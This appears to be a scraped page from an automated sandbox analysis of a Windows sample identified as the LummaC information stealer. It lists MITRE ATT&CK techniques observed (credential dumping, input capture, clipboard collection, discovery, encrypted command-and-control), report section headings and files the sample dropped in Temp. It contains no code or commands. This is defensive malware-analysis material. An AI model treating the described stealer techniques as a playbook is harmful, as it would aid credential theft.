Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CLaYpUL3zw.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CLaYpUL3zw.exe.log

C:\Users\user\AppData\Local\Temp\768400\Climb.com

C:\Users\user\AppData\Local\Temp\768400\V

C:\Users\user\AppData\Local\Temp\Alt

C:\Users\user\AppData\Local\Temp\Articles

C:\Users\user\AppData\Local\Temp\Attractions

C:\Users\user\AppData\Local\Temp\Beaches

C:\Users\user\AppData\Local\Temp\Cooked

C:\Users\user\AppData\Local\Temp\Enrolled

C:\Users\user\AppData\Local\Temp\Fingers

Windows Analysis Report
CLaYpUL3zw.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre